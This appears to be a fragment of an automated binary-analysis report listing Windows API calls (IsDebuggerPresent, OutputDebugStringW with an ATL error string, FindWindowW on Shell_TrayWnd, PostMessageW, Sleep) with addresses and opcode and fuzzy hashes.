                                          • IsDebuggerPresent.KERNEL32(?,?,?,00DD100A), ref: 00E0B544
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DD100A), ref: 00E0B553
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E0B54E
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 9d87ab76386c9f69edc8b5779216078b5921c21eb32a2a9ff7718890266165d6
                                          • Instruction ID: 56c1fa03944ae862c11bd56e82b33bf1de890285475e7d71c9517a460477eaee
                                          • Opcode Fuzzy Hash: 9d87ab76386c9f69edc8b5779216078b5921c21eb32a2a9ff7718890266165d6
                                          • Instruction Fuzzy Hash: D5E06DB02007118FD725DF29D8043427BE4FB00745F00C96EE586E37A1EBB4D448CB61
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E55BF5
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E55C08
                                            • Part of subcall function 00E354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          Strings
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 0f9d8b12e7faee13cc34090502e966bfac4b0138aa1ce5a4d0b547e0739aded7
                                          • Instruction ID: c70396ea7a4f3bb1848d9d3b11365ceb25b640a808d57b7ce852aa7c94feca31
                                          • Opcode Fuzzy Hash: 0f9d8b12e7faee13cc34090502e966bfac4b0138aa1ce5a4d0b547e0739aded7
                                          • Instruction Fuzzy Hash: C5D0C932398311BBE778BB71AC5FF976A54AB40B52F140C35B75ABA1D0D9E45804C690